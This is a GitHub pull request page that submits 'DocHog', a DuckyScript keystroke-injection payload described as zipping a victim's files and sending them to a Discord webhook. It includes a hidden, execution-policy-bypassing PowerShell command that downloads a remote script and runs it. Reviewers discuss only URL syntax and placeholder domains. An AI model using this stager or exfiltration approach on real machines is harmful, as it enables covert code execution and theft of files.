-
Notifications
You must be signed in to change notification settings - Fork 1.4k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
New Payload - DocHog #366
base: master
Are you sure you want to change the base?
New Payload - DocHog #366
Conversation
REM Author: atomiczsec | ||
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. | ||
|
||
DEFINE URL http://new-url.com/powershell.ps1 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
DELAY 2000 | ||
GUI r | ||
DELAY 500 | ||
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
this references $URL
but your DEFINE is URL
and should be #URL
@dallaswinger Here is the updated version, please lmk if there needs to be anything else done! |
DELAY 2000 | ||
GUI r | ||
DELAY 500 | ||
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr URL dl=1; iex $pl |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
(Assuming you are attempting to call your definition for #URL) you need to have a #
to call your definition
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URL dl=1; iex $pl
REM Author: atomiczsec | ||
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. | ||
|
||
DEFINE #URL http://new-url.com/powershell.ps1 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please change this to example.com
Including URLs
URLs used for retrieving staged code should refer exclusively to example.com using DEFINE in any payload submissions see Payload Configuration section below.
No description provided.